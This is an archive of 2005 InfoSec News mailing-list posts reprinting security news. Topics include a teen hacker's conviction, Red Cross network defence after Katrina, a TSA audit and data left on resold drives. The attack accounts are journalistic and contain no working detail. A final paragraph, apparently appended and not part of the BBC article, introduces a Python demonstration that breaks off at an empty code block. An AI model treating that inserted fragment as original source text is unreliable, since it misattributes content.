From isn at c4i.org Tue Sep 13 02:41:08 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:49:42 2005 Subject: [ISN] Red Cross Works to Better Protect Its Networks From Attacks, Scams Message-ID: http://www.computerworld.com/securitytopics/security/story/0,10801,104539,00.html By Jaikumar Vijayan SEPTEMBER 12, 2005 COMPUTERWORLD Information security staffers at the American Red Cross, which was hit last month by the Zotob worm, are working overtime to try to protect the organization's networks against attacks amid surges in usage of the networks following Hurricane Katrina. In addition, the emergency relief agency has turned to the FBI and others for help in preventing the spread of imitation Red Cross Web sites set up by scam artists. "The infrastructure is stretched, and I'm not sure we can tolerate another outbreak" like the Zotob attack, said Ron Baklarz, the Washington-based organization's chief information security officer. Zotob, which took advantage of a hole in the plug-and-play component in Microsoft Corp.'s Windows software, "saturated" sections of the Red Cross' networks, making them inaccessible to users for several hours last month, Baklarz said. Consequently, the organization turned to security experts to "take a second look at the security technologies we have in place today to ensure that we have tuned them as best as we can under the increased load," he said. The Red Cross is implementing new technologies such as intrusion-detection and -prevention systems -- some of them donated by vendors -- to bolster network security, said Baklarz. Also, not all of the Web sites that the Red Cross has created for remote field offices set up to aid Katrina victims have a direct link back to the organization's network. "We are trying to put Web-based applications out there that can be accessed without people coming to the corporate network," Baklarz said without elaborating. 
The Red Cross is working with the FBI Internet Fraud Complaint Center to shut down sites allegedly created by scam artists involved in Katrina-related fraud. "We anticipated there would be a lot of fraudulent activity on the Internet," Baklarz said. "We wanted to triage with the FBI and make sure they saw examples of the legitimate e-mail that is sent out from the Red Cross so that they know what to look for." Appeals have also been sent to organizations such as Bethesda, Md.-based SANS Institute and various government and nongovernmental agencies to keep an eye out for anything that looks like a scam, Baklarz said. As of last Thursday, about 20 such sites had been identified and were being investigated by the FBI for possible follow-up action. "Every time an event like this occurs, it brings out the best and the worst in people," Baklarz said. "Unfortunately, in my position, I've got to think about and respond to the worst." From isn at c4i.org Tue Sep 13 02:41:23 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:50:01 2005 Subject: [ISN] Massachusetts Teen Convicted for Hacking into Internet and Telephone Service Providers and Making Bomb Threats Message-ID: http://www.govtech.net/magazine/channel_story.php/96608 By News Staff Sept 11, 2005 A Massachusetts juvenile pled guilty in federal court and was sentenced Thursday in connection with a series of hacking incidents into Internet and telephone service providers; the theft of an individual's personal information and the posting of it on the Internet; and making bomb threats to high schools in Florida and Massachusetts; all of which took place over a 15-month period. Victims of the juvenile's conduct have suffered a total of approximately $1 million in damages, according to a release from the U.S. Attorney's Office. United States Attorney Michael J. Sullivan for the District of Massachusetts; United States Attorney H. E. Bud Cummins, III for the Eastern District of Arkansas; United States Attorney R. 
Alexander Acosta for the Southern District of Florida; Steven D. Ricciardi, Special Agent in Charge of the U.S. Secret Service in New England; Kenneth W. Kaiser, Special Agent in Charge of the Federal Bureau of Investigation in New England; William Sims, Special Agent in Charge of the Secret Service in Miami, Florida; and William C. Temple, Special Agent in Charge of the Federal Bureau of Investigation in Little Rock, Arkansas, announced today that in a sealed court proceeding a Massachusetts teenager pled guilty before U.S. District Judge Rya W. Zobel to an Information charging him with nine counts of juvenile delinquency. By statute, federal juvenile proceedings and the identity of juvenile defendants are under seal. The Court has authorized limited disclosure in this case at the request of the government and defendant. Judge Zobel also imposed a sentence today of 11 months' detention in a juvenile facility, to be followed by two years of supervised release. During his periods of detention and supervised release, the juvenile is also barred from possessing or using any computer, cell phone or other electronic equipment capable of accessing the Internet. Had the juvenile been an adult, the underlying charges would have been charged as three counts of making bomb threats against a person or property, three counts of causing damage to a protected computer system, two counts of wire fraud, one count of aggravated identity theft, and one count of obtaining information from a protected computer in furtherance of a criminal act. "Computer hacking is not fun and games," stated U.S. Attorney Sullivan. "Hackers cause real harm to real victims as graphically illustrated in this case." "Would-be hackers, even juveniles when appropriate, should be put on notice that such criminal activity will not be tolerated and that stiff punishments await them if they are caught." 
As a result of this bomb threat, the school was closed for two days, while a bomb squad, a canine team, the fire department and Emergency Medical Services were called in. In August, 2004, the juvenile logged into the Internet computer system of a major Internet Service Provider ("ISP") using a program he had installed on an employee's computer. This program allowed the juvenile to use the employee's computer remotely to access other computers on the internal network of the ISP and gain access to portions of the ISP's operational information. In January, 2005, the juvenile gained access to the internal computer system of a major telephone service provider that allowed him to look up account information of the telephone service provider's customers. He used this computer system to discover key information about an individual who had an account with the telephone service. He then accessed the information stored on this individual's mobile telephone, and posted the information on the Internet. During this same time period, the juvenile used his access to the telephone company's computer system to set-up numerous telephone accounts for himself and his friends, without having to pay for the accounts. Also in January, 2005, an associate of the juvenile set-up accounts for the juvenile at a company which stores identity information concerning millions of individuals allowing the juvenile to look at the identity information for numerous individuals, some of which he used for the purpose of looking up the account information for the victim whose personal information he posted on the Internet. In the spring of 2005, the juvenile, using a portable wireless Internet access device, arranged with one or more associates to place a bomb threat to a school in Massachusetts and local emergency services, requiring the response of several emergency response units to the school on two occasions and the school's evacuation on one. 
In June, 2005, the juvenile called a second major telephone service provider because a phone that a friend had fraudulently activated had been shut off. In a recorded telephone call, the juvenile threatened the telephone service provider that if the provider did not provide him access to its computer system, he would cause its Web service to collapse through a denial of service attack -- an attack designed to ensure that a Website is so flooded with requests for information that legitimate users cannot access the Website. The telephone service provider refused to provide the requested access. Approximately ten minutes after the threat was made, the juvenile and others initiated a denial of service attack that succeeded in shutting down a significant portion of the telephone service provider's Web operations. From isn at c4i.org Tue Sep 13 02:41:36 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:50:24 2005 Subject: [ISN] Experts unconcerned over Microsoft patch delay Message-ID: http://news.zdnet.co.uk/internet/security/0,39020375,39217821,00.htm Tom Espiner ZDNet UK September 12, 2005 The decision to delay the latest Windows patch has been praised by the security industry. Security experts are largely unconcerned about the delay to Microsoft's latest critical security patch, as they believe hackers will struggle to exploit the vulnerabilities that the patch was meant to fix. The patch was due to be released on Tuesday, but was pulled on Friday after Microsoft "encountered a quality issue that necessitated the update to go through additional testing and development before it is released", according to the company Web site. Mikko Hyppönen, director of antivirus research at Finnish security company F-Secure, said as the bug existed in Microsoft software before the company announced a fix, there is no difference to the security risk facing Windows users today. 
"There are not suddenly going to be hundreds of underground hackers just concentrating on finding this one security flaw, I think," Hyppönen said. Hyppönen was glad that Microsoft had decided to not release a patch with bugs. "I prefer it this way," he said. "It would generate more problems if Microsoft released a buggy patch. Most exploits exploit an existing patch." If a buggy patch that many users chose not to install were released, hackers could examine that patch to find the flaws in the original software, Hyppönen said, whereas "at the moment it's like shooting in the dark" for the hackers. Graham Cluley, senior technology consultant at security company Sophos, agreed. "At the moment there's not much information on the vulnerability. It's better that Microsoft not roll out [the update] than roll it out flawed. Obviously we're keen to get the update, and [the announcement that no update would be available] was a bit up against the wire, but it's better that Microsoft stopped the release," he said. "As long as no information leaks out from Microsoft, we don't think there's much risk to users. As far as we know there are no exploits out there for the current flaw," Cluley said. "Obviously this will cause some embarrassment to Microsoft -- they've said to us there will be an update, then turned around and said 'Whoops, not just yet', but we don't think there's much risk to users," he said. As to when the patch would be released, Cluley said "Microsoft may decide to release the patch in a month, but hopefully they'll release it as soon as it's ready." Hyppönen concurred. "They [Microsoft] might simply release it next month," he said. All the experts questioned declined to speculate as to which part of Windows was addressed by the update. "There are so many potential holes I couldn't possibly guess which one it's for," joked Alex Shipp, chief antivirus developer for MessageLabs. 
From isn at c4i.org Tue Sep 13 02:45:31 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:50:47 2005 Subject: [ISN] Microsoft rejects S. Korea's demand for continued security patches Message-ID: http://english.yna.co.kr/Engnews/20050913/460100000020050913145408E9.html 2005/09/13 SEOUL, Sept. 13 (Yonhap) -- Software giant Microsoft Corp. has rejected South Korea's intelligence agency's request that a planned halt to security patch releases for a version of the Windows operating system be postponed, according to the spy agency's cyber security team Tuesday. The National Cyber Security Center, affiliated with the National Intelligence Service, said its demands for Microsoft to extend the release of Windows 98 security patches were met with refusals. From isn at c4i.org Tue Sep 13 02:40:31 2005 From: isn at c4i.org (InfoSec News) Date: Tue Sep 13 02:51:07 2005 Subject: [ISN] Linux Security Week - September 12th 2005 Message-ID: +---------------------------------------------------------------------+ | LinuxSecurity.com Weekly Newsletter | | September 12th, 2005 Volume 6, Number 38n | | | | Editorial Team: Dave Wreski dave@linuxsecurity.com | | Benjamin D. Thomas ben@linuxsecurity.com | +---------------------------------------------------------------------+ Thank you for reading the LinuxSecurity.com weekly security newsletter. The purpose of this document is to provide our readers with a quick summary of each week's most relevant Linux security headlines. This week, perhaps the most interesting articles include "Security moves back into top 5 IT priorities," "Popular policies: keeping storage secure," and "The Mobility Threat." --- ## Master of Science in Information Security ## Earn your Master of Science in Information Security online from Norwich University. Designated a "Center of Excellence", the program offers a solid education in the management of information assurance, and the unique case study method melds theory into practice. 
Using today's e-Learning technology, you can earn this esteemed degree, without disrupting your career or home life. LEARN MORE: http://www.msia.norwich.edu/linux_en --- LINUX ADVISORY WATCH This week, advisories were released for proftpd, sqwebmail, polygen, affix, zsync, phpgroupware, webcalendar, pcre3, ntp, cvs, kdelibs, evince, openmotif, cman, gnbd-kernel, dlm-kernel, lockdev, perl, termcap, ckermit, kdegraphics, squid, pam, setup, tar, openssh, tzdata, httpd, mplayer, and phpldapadmin. The distributors include Debian, Fedora, Gentoo, and Red Hat. http://www.linuxsecurity.com/content/view/120342/150/ --- Hacks From Pax: PHP Web Application Security By: Pax Dickinson Today on Hacks From Pax we'll be discussing PHP web application security. PHP is a great language for rapidly developing web applications, and is very friendly to beginning programmers, but some of its design can make it difficult to write web apps that are properly secure. We'll discuss some of the main security "gotchas" when developing PHP web applications, from proper user input sanitization to avoiding SQL injection vulnerabilities. http://www.linuxsecurity.com/content/view/120043/49/ --- Network Server Monitoring With Nmap Portscanning, for the uninitiated, involves sending connection requests to a remote host to determine what ports are open for connections and possibly what services they are exporting. Portscanning is the first step a hacker will take when attempting to penetrate your system, so you should be preemptively scanning your own servers and networks to discover vulnerabilities before someone unfriendly gets there first. http://www.linuxsecurity.com/content/view/119864/150/ --- >> The Perfect Productivity Tools << WebMail, Groupware and LDAP Integration provide organizations with the ability to securely access corporate email from any computer, collaborate with co-workers and set-up comprehensive addressbooks to consistently keep employees organized and connected. 
http://ads.linuxsecurity.com/cgi-bin/newad_redirect.pl?id=gdn05 --> Take advantage of the LinuxSecurity.com Quick Reference Card! --> http://www.linuxsecurity.com/docs/QuickRefCard.pdf +---------------------+ | Security News: | <<-----[ Articles This Week ]---------- +---------------------+ * IptablesWeb v.1.0 8th, September, 2005 IptablesWeb is a free software (under GPL licence): it makes possible to inspect iptables logs by using a web browser. It's a plugin-based multilanguage software written in PHP using 3 free php classes. http://www.linuxsecurity.com/content/view/120297 * Creating info society: Broadband and info security 6th, September, 2005 The explosion of spamming, hoaxes and cyber attacks has highlighted just how vulnerable users are to security breaches and the steps they need to take to protect themselves. While both dial-up and broadband connections can be affected by such security breaches, an always-on broadband connection is undoubtedly an easier target. This is because the always-on nature of a broadband connection means that attacks and hacking can happen around the clock, raising the stakes by comparison with a computer that is only on for short periods. Luckily, there are many tools available to make broadband connections secure and attractive to users and potential users. http://www.linuxsecurity.com/content/view/120310 * Big debate over small packets 8th, September, 2005 Fernando Gont is nothing if not tenacious. Earlier this year, the Argentinian researcher highlighted several attacks that could disrupt network connections using the Internet control message protocol, or ICMP, and proposed four changes to the structure and handling of network-data packets that would essentially eliminate the risk. 
http://www.linuxsecurity.com/content/view/120329 * Cisco Issues Fixes for Vulnerable Web Routers 8th, September, 2005 Cisco alerted its customers Wednesday about a serious security flaw in many of its Internet routers, which serve as key intersections in channeling Web and e-mail traffic from point to point. Cisco Systems Inc., based in San Jose, Calif., warned that attackers could use the flaw to seize control over specified vulnerable routers, not most routers currently in use. http://www.linuxsecurity.com/content/view/120333 * MS wrong on security claims: Red Hat 6th, September, 2005 Red Hat is accusing Microsoft of getting its facts wrong in its latest attack on Linux security. In an update on security at Microsoft's recent world-wide partner conference, the company's security head Mike Nash took aim at Linux to single out Red Hat. http://www.linuxsecurity.com/content/view/120309 * OpenSSH update fixes recent vulnerabilities 5th, September, 2005 The first fix prevents "GatewayPorts" from being "incorrectly activated for dynamic ('-D') port forwardings when no listen address was explicitly specified," according to the changelog. http://www.linuxsecurity.com/content/view/120299 * Red Hat Unveils IT Courses 7th, September, 2005 Red Hat, the world's leading provider of open source solutions to the Enterprise, announced the addition of Institute of Advanced Computing Management (IACM) to their Authorised Training Partner Network, which extends across India, Nepal, Bangladesh, Sri Lanka and Pakistan. Red Hat's complete range of Training and Certification programs will now be available at IACM.

http://www.linuxsecurity.com/content/view/120320 * Security moves back into top 5 IT priorities 7th, September, 2005 With Labor Day weekend quickly vanishing into a memory, the team has just finished compiling this month's IT priorities data. The big news is that what happened last month with security is now pretty much undone. It is back in the top 5 list, just barely edging out IT management for the fifth position (it was in fourth back in July). Software infrastructure and hardware upgrades also swapped positions and are in second and third respectively. As usual, wired and wireless projects are up on top as organizations buy into data and voice network convergence and install wireless networking equipment. Overall, things are looking good. According to the US Commerce Department, in Q2 2005, businesses spent 17.3% more on computers and peripheral equipment than they did in Q2 2004. http://www.linuxsecurity.com/content/view/120321 * Email security - what are the issues? 8th, September, 2005 As email becomes more prevalent in the market, the importance of email security becomes more significant. In particular, the security implications associated with the management of email storage, policy enforcement, auditing, archiving and data recovery. http://www.linuxsecurity.com/content/view/120331 * Popular policies: keeping storage secure 9th, September, 2005 Secure storage of data has always been essential for any organisation, of whatever size. In the past this involved accurate filing of paper records, and then keeping the physical archive secure, whether it was simply locking a filing cabinet, or guarding an entire building. http://www.linuxsecurity.com/content/view/120345 * The Mobility Threat 5th, September, 2005 We live in an era where mobile devices are being used by all levels of society. Today, it is fairly common to see a CEO or a school kid carrying a PDA or mobile phone. 
According to a survey by Infocomm Authority of Singapore (IDA), the penetration rate of mobile phones in Singapore has grown to 91 percent in 2004. Sophisticated PDA phones and other mobile devices such as the Blackberry are actually miniaturised PCs and they have become ubiquitous. http://www.linuxsecurity.com/content/view/120300 ------------------------------------------------------------------------ Distributed by: Guardian Digital, Inc. LinuxSecurity.com To unsubscribe email newsletter-request@linuxsecurity.com with "unsubscribe" in the subject of the message. ------------------------------------------------------------------------ From isn at c4i.org Wed Sep 14 04:28:19 2005 From: isn at c4i.org (InfoSec News) Date: Wed Sep 14 04:33:38 2005 Subject: [ISN] Teen Pleads Guilty to Hacking Paris Hilton's Phone Message-ID: http://www.washingtonpost.com/wp-dyn/content/article/2005/09/13/AR2005091301423.html By Brian Krebs washingtonpost.com Staff Writer September 13, 2005 A Massachusetts teenager has pleaded guilty to hacking into the cell-phone account of hotel heiress and Hollywood celebrity Paris Hilton, a high-profile stunt by the youngest member of the same hacking group federal investigators say was responsible for a series of electronic break-ins at data giant LexisNexis. The 17-year-old boy was sentenced to 11 months' detention at a juvenile facility for a string of crimes that include the online posting of revealing photos and celebrity contact numbers from Hilton's phone. As an adult, he will then undergo two years of supervised release in which he will be barred from possessing or using any computer, cell phone or other electronic equipment capable of accessing the Internet. The U.S. Attorney's Office for Massachusetts and the state district court declined to identify the teen, noting that federal juvenile proceedings and the identity of juvenile defendants are under seal. 
But a law enforcement official close to the case confirmed that the crimes admitted to by the teen included the hacking of Hilton's account.

The teen also pleaded guilty to making bomb threats at two high schools and to breaking into a telephone company's computer system to set up free wireless-phone accounts for friends. He also participated in an attack on data-collection firm LexisNexis Group that exposed personal records of more than 300,000 consumers. Prosecutors said victims of the teen's actions have suffered about $1 million in damages.

In a series of telephone and online communications between March and June with a washingtonpost.com reporter, the teen acknowledged responsibility for all of the crimes for which he was sentenced. Washingtonpost.com is not revealing his name because he communicated with the reporter on the condition that he not be identified either directly or through his online alias.

Investigators began focusing on the teen in March 2004 when he sent an expletive-laced e-mail to a high school in Florida threatening to blow it up, according to a statement from prosecutors. The school was closed for two days while a bomb squad, a canine team, the fire department and other emergency officials examined the building.

In August 2004, the teen broke into the internal computer systems of "a major internet service provider" by tricking an employee into opening a virus-infected file he sent as an e-mail attachment. The virus -- known as a "Trojan horse" program -- allowed the juvenile to use the employee's computer remotely to access other computers on the ISP's internal network and gain access to portions of the company's operational information, prosecutors said.

The teen told washingtonpost.com earlier this year that around that time he broke into the network of Dulles, Va.-based America Online. AOL did not return calls seeking comment.

In January, the teen hacked into the telephone records system of T-Mobile International.
He used a security flaw in the company's Web site that allowed him to reset the password of anyone using a Sidekick, a pricey phone-organizer-camera device that stores videos, photos and other data on T-Mobile's central computer servers.

A month later, the teen would use that flaw to gain access to Hilton's Sidekick files, according to corroborating information and screen shots he shared with washingtonpost.com.

Later that month, according to prosecutors, an associate of the teen "set up accounts for the juvenile at a company which stores identity information concerning millions of individuals."

Again, prosecutors declined to name the company targeted in that attack. But according to screen shots provided by the teen -- supported by other information from the teen that was verified by a senior federal law enforcement official investigating the case who spoke on condition of anonymity -- the company was LexisNexis, which reported in March that hackers had gained access to the personal records of more than 310,000 Americans.

An adult member of the hacker group acknowledged in phone conversations with a washingtonpost.com reporter that he collaborated with the teen in sending hundreds of e-mails with an explicit image and a message urging recipients to open an attached file to view additional pornographic images of children.

According to both hackers, a police officer in Florida was among those who opened the e-mail attachment, which harbored a virus-like program that allowed the hackers to record anything a victim typed on his or her computer keyboard.

Not long after his computer was infected with the keystroke-capturing program, the officer logged on to his police department's account at Accurint, a LexisNexis service provided by Florida-based subsidiary Seisint Inc., which sells access to consumer data. The teen said the group members then created a series of sub-accounts using the police department's name and billing information.
Over a period of several days, the group looked up thousands of names in the database, including those of friends and celebrities.

Then in June, according to prosecutors, he called "a major telephone service provider because a phone that a friend had fraudulently activated had been shut off." (A washingtonpost.com reporter was invited to listen in on the call, which was made to Little Rock-based Alltel Corp.)

When the company refused to provide the requested access, the teen threatened to cripple its Web site with a "distributed denial of service" attack, in which attackers use the Internet bandwidth of hundreds or thousands of remote-controlled computers to overwhelm a site with so much traffic that it can no longer accommodate legitimate visitors.

Roughly 10 minutes later the teen and others "initiated a denial of service attack that succeeded in shutting down a significant portion of the telephone service provider's web operations," according to the prosecutors.

The Justice Department said the investigation of the teen's associates is continuing, but it remains unclear how many of those individuals will be prosecuted. In May, Secret Service and FBI officials served search warrants on at least nine people thought to be connected to the hacking ring of which the teen was a member, known as the "Defonic Team Screen Name Club" or "DFNCTSC" for short.

The teen is likely to be required as a condition of his plea agreement to cooperate with the government in their ongoing investigation and provide information not only about how the attacks were carried out, but who else was involved and what their roles were, said Mark D. Rasch, senior vice president at McLean, Va.-based online security firm Solutionary Inc. and a former federal prosecutor for computer crimes.

According to interviews with at least two other former members of the group, investigators now are focusing on the individual who helped the teen gain access to LexisNexis.

"They came and took my laptop and asked a whole bunch of questions about him," a former group member known online as "DJint" said. "They told me they're looking to go after him for access-device fraud and possession of child pornography."

Still, Rasch said, it could be some time before the government wraps up its investigation into these attacks.

"Investigations of computer crimes are particularly difficult because they always involve many different types of evidence from numerous locations, and they require cooperation from many different organizations," Rasch said. "It's hard work."

© 2005 Washingtonpost.Newsweek Interactive

From isn at c4i.org Wed Sep 14 04:28:36 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 14 04:33:56 2005
Subject: [ISN] Report: Gaps persist in TSA network security
Message-ID:

http://www.washingtontechnology.com/news/1_1/daily_news/26983-1.html

By Alice Lipowicz
Staff Writer
09/13/05

The Transportation Security Administration has improved its network security, but the agency still cannot ensure that critical computer network operations and data are protected from hackers and can be restored following an emergency, according to a new report [1] from the Homeland Security Department's Office of the Inspector General.

The TSA falls short in developing and implementing processes such as security testing, monitoring with audit trails, configuration and patch management, and password protection, the report said. Also, contingency plans have not been made final nor tested.

"TSA has taken actions and made progress in securing its networks," states the redacted version of the report. "However, TSA can make further improvements to secure its networks."

Computer networks are vital to homeland security for sharing information among government agencies. But they also contain sensitive data that must be protected from unauthorized access and manipulation from hackers and cyberterrorists.
The TSA, which oversees passenger and baggage screening and other security procedures at the nation's airports, shares information with airports through a wide area network. But it lacks a comprehensive security testing program to ensure the integrity of that network, the report said.

While some vulnerability scans are performed monthly, TSA does not conduct "penetration testing" and "password analysis," and does not test all devices connected to the network as recommended, the report said.

"Security vulnerabilities continue to exist because TSA has not implemented a comprehensive testing program to identify obsolete software versions or applicable patches on its network devices," the inspector general wrote.

The report recommended testing to include "periodic network scanning, vulnerability scanning, penetration testing, password analysis and war driving." TSA officials agreed with the advice, according to the report.

TSA has strengthened security configurations on its servers and workstations in comparison to what was found in a previous audit, the report said. However, the agency still needs to make improvements including detailed configuration procedures, development of a patch management policy, implementing a strong password policy and secure configuration of routers.

The audit found a list of accounts on two TSA workstations that could be accessed without identification and authentication, a vulnerability which could be exploited by a hacker.

On patch management, the audit discovered that TSA relies on the patch management procedures developed by the contractor responsible for network management, and it recommended that the agency develop its own documented policy.

The inspector general scolded TSA for allowing multiple users to share passwords for several administrative accounts, and it also pointed out that TSA's draft password policy does not comply with the Homeland Security Department's requirements for strong passwords.
[1] http://www.dhs.gov/interweb/assetlibrary/OIGr_05-31_Aug05.pdf

From isn at c4i.org Wed Sep 14 04:29:30 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 14 04:34:16 2005
Subject: [ISN] Katrina: a tough lesson in security
Message-ID:

http://www.theregister.co.uk/2005/09/13/katrina_security_lessons/

By Mark Rasch
SecurityFocus
13th September 2005

In the waning days of August, a massive category four hurricane devastated the gulf coast of the United States, particularly the city of New Orleans. In addition to the estimated $50bn in property damage, clean-up and reconstruction costs, and the hundreds of likely dead, and tens of thousands displaced, the hurricane and its aftermath have disrupted businesses throughout the southern United States.

From this disaster, there are a few lessons that IT staff, IT security staff and senior management should learn. The sad thing is that many won't take these lessons to heart.

1. Infrastructure is important

Much of the devastation resulting from hurricane Katrina, particularly to the city of New Orleans, resulted not from the initial wind damage, but from the collapse of key portions of the infrastructure which were not designed to withstand an event that, at least in retrospect, was eminently predictable, if not inevitable. The collapse of key levees in the Big Easy caused tens of millions of dollars of damage and loss because they were designed to withstand only a category three hurricane.

In most companies, the IT infrastructure has grown organically, based upon the needs or perceived needs of individual business units. Thus, the mix of hardware and software, applications, technologies and processes is generally not mapped, and generally not adequate. Most entities do not know what technologies they have employed, what software (or versions) they are using, or even what the scope and extent of their network looks like.
In addition, in most enterprises, "security" is a discrete item - it's an add-on, often an afterthought, yet it's frequently mentioned in one of those "oh by the way" telephone calls after some new application is about to go (or has already gone) live.

Infrastructure is fragile and brittle. Survivability, redundancy, and security have to be built into it at the outset. An elegant network or application is of no use if it is destroyed, insecure, or inoperable. Duh.

2. Infrastructures are co-dependent

We typically think of IT as a single infrastructure, but it is not. Perhaps if your network and the Internet are seen as one and the same, it's easier to explain all those security breaches on "your" network.

When the hurricane took down the electricity, the oil and natural gas refineries on the mainland of the gulf coast could not operate, nor could the pumping stations pump any oil or gas. A single catastrophic event will likely lead to the disruption of multiple infrastructures, each dependent upon the others.

The same is true for both IT and IT security. Electricity, telecommunications, Internet, transportation, and people are all co-dependent. Knowledge of these facts should inform not only your disaster recovery plans, but also your initial design. Don't forget that hardware, software, policy, planning and training are also key elements of your infrastructure.

3. Prevention is cheaper than response (usually)

Much of the work of prevention - knowing what the risks to the enterprise are, and mitigating these risks where it's cost-effective - can and should be done long before any attack or disaster affects an enterprise. It has been estimated that the costs of responding to an attack, including personnel costs, data recovery costs, diversion of attention from other priorities, direct economic damage and theft, and costs that damage one's reputation are often from 10 to 100 times the cost of preventing the damage in the first place.
Right now, the tens of millions of dollars it would have cost to shore up and improve the levees looks like a sound investment. A month ago, it was government pork barrel spending.

We typically tie IT security spending to a percentage of the overall IT budget, and then value security based upon the value of the IT infrastructure. Why spend $50,000 to secure an IT asset that itself only cost (or is worth) $5,000? This is the wrong way to analyze the situation. We need to address the cost not of the IT itself, but the value of the information that is being processed by, stored on, or transmitted through the infrastructure.

The correct questions to ask are: "What would happen to my enterprise if this information was lost? Corrupted? Stolen? Unavailable?" What would happen to the company's reputation? To the ability to deliver services? Remember that in security we are protecting companies and agencies, not computers.

4. Cost of response is shifted

A typical axiom in the tort law of negligence is that we impose the liability upon the party or entity best able to avoid the damage or risk. In the case of the New Orleans flooding, this would have been some combination of the local, state and federal governments, including the U.S. Army Corps of Engineers, and of course, the United States Congress that funds these projects, as well as the electorate that votes for these Members of Congress. Had better, stronger and more durable levees been constructed and maintained, billions of dollars of damage could have been prevented.

However, in most situations, the people bearing the risk of loss are not the same people who have to make the decisions about prevention. Homeowners in New Orleans essentially had little say about whether the levees were built (although they could have chosen to live elsewhere - like San Francisco or Sri Lanka?)
What is worse, drivers in Washington, D.C., those who are now paying $3.70 a gallon for gas that was just $2.50 before the hurricane, previously had little reason to support plans to build stronger levees or redundant distribution centers on the gulf coast. Operators of the closed Houston Astrodome also had little reason to appreciate the effects of a hurricane in Louisiana on their facility.

In IT attacks, the same is true. The people whose information is affected by the attack may be distant - temporally, proximally or otherwise - from the decisions about whether or how to secure the IT. The cost of prevention may come from the IT budget, but the benefit goes to other business units' productivity and it is rarely captured. The same is true for the costs of avoidance. We need better metrics for the TRUE cost of NOT providing adequate security, and then we will be better able to make informed decisions about how much to spend on security.

5. Insurance is important

In the aftermath of hurricane Katrina, many individuals who thought they had insurance (because they had been paying thousands of dollars in premiums, for years) to cover damages resulting from the hurricane find that they may not be insured for the damages. This is because most insurance policies have specific riders excluding coverage for damage resulting from "flooding." So if a hurricane blows out a levee causing water to crash into and submerge your house, the damage, although caused by a hurricane, may not be covered.

Many insurance companies offer various forms of insurance to protect key parts of the IT infrastructure. These include general business interruption insurance, reputation insurance, theft, damage or loss insurance, critical document insurance, and various forms of cyber-insurance. However, these policies contain riders and exclusions that are often confusing and mutually contradictory.
If there is "physical damage" to a computer that holds your critical documents, you may be covered, but "logical damage" may not be covered. If the hard drives are wiped out by a flood it may be covered, and similarly if they're wiped by a magnet or a power surge they may be covered - but if they're wiped by a virus or worm, they are excluded.

Thus, in conducting risk assessment it is important to review all of your insurance policies (including your D&O policies) to make sure you have appropriate coverage. Also remember that when you are reducing your risk by implementing a comprehensive IT security program, you are also reducing the risk of your insurance company, which ultimately would have to pay for covered losses. As a result, just as when you put in a smoke alarm or burglar alarm, you should contact the insurance company when you plan to make significant changes in your security to see whether they will reduce your premiums -- or better yet, pay for the improvements directly. Some companies, particularly those that offer cyber-insurance policies, will even pay for comprehensive audits or assessments themselves. Free security? What could be better?

6. Backup, backup and backup

The day before I go to the dentist, I try to do about six months worth of flossing and brushing. Sure, we all know we need to do this, and there is nothing sexy about having a plan for backups, but we frequently don't do them properly - not only at the corporate level, but at the personal level as well.

The hurricane also taught us that many of our plans for data recovery and disaster recovery may be too limited. For example, prior to September 11, 2001, the federal, state and city disaster centers were located in close proximity to each other for planning, coordination and communications purposes. These were, of course, located in the World Trade Center. Not a bad decision to start with, but a very unfortunate result.
Similarly, we often have wonderful backup plans to back up data and store it at a remote location just a few blocks or miles away. In the wake of the hurricane, we need to reconsider these decisions. Work locally and back up globally.

Of course, this creates new problems. The more distributed information becomes, the more vulnerable it is to attack, disruption, and to the legal processes of the country in which it is located. Outsourcing data storage may solve some of these problems, but it may also create new problems itself. These are all fun things to think about.

7. Training and testing

The ultimate defense against disaster is well trained and well equipped people. Too few companies bother to train their employees to recognize cyber attacks, and to respond appropriately to them. All the technology in the world won't help unless people know it exists and know how and when to use it. Awareness and training are critical to success.

A cyber attack, like the breach of the New Orleans levees, is more than likely. The best enterprises will be prepared, and therefore will survive.

Copyright © 2004

-=-

SecurityFocus columnist Mark D. Rasch, J.D., is a former head of the Justice Department's computer crime unit, and now serves as Senior Vice President and Chief Security Counsel at Solutionary Inc.

From isn at c4i.org Wed Sep 14 04:30:01 2005
From: isn at c4i.org (InfoSec News)
Date: Wed Sep 14 04:35:53 2005
Subject: [ISN] Data dangers dog hard drive sales
Message-ID:

http://news.bbc.co.uk/2/hi/technology/4229550.stm

12 September 2005

Many people are taking risks with data on hard drives and memory cards which they are selling via eBay, say experts.

Letters, resumes, spreadsheets, phone numbers and e-mail addresses were all found on storage hardware bought and analysed by forensics firm Disklabs.

Also recoverable were temporary files from net browsers which contained login details and passwords for websites and even online bank accounts.
The problems arose because sellers were only taking basic steps to delete data.

Key change

In its test of how good users were at destroying data, Disklabs bought 100 hard drives and 50 memory cards - which included SD cards, flash drives, sim cards and memory sticks - from the auction site.

Simon Steggles, director of Disklabs, said the drives and memory cards were probably being sold by people upgrading home PCs or changing their mobile phone.

"Most people made only cursory attempts to erase the data," said Mr Steggles, "and some had not done even that."

During its investigation, Disklabs found large amounts of personal and confidential business data on storage hardware.

Most worryingly, said Mr Steggles, it was possible to extract the temporary files that Microsoft's Internet Explorer browser uses to keep track of what people do when they are using the web.

With a little work, it was possible to reconstruct almost everything that some users did online, and to grab cookies and login details for sites they visited.

"With not a massive amount of work we could go in there and help ourselves to whatever we want," he told the BBC website.

In many cases, only the delete key was used to remove data. However, in PCs and many other digital devices all this does is apply a label that says these sections of storage can be over-written. On large disk drives this can mean the supposedly deleted data remains intact for a long time.

In such cases, said Mr Steggles, recovering data is very straight-forward for forensic firms and, perhaps, technically-aware thieves.

What users needed to realise, he said, was how hard it was to destroy data. Even formatting hard drives and other memory cards would not irrevocably remove information stored on them.

If users were worried about potentially sensitive data, said Mr Steggles, they should use a professional forensics firm to erase it. "Alternatively," he said, "they could smash it to bits."
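The point the article makes about the delete key, illustrated with an added example that is not part of the BBC piece and not Disklabs' tooling: a toy block device with an allocation bitmap and a directory, constructed here, shows that a plain delete and a quick format only rewrite the metadata, so a raw scan of the media still finds the data, whereas overwriting the blocks before releasing them leaves nothing to recover. The class, method and sample names (ToyDisk, carve, the "cookies.txt" contents) are assumptions for the demonstration, not any real filesystem's layout.

```python
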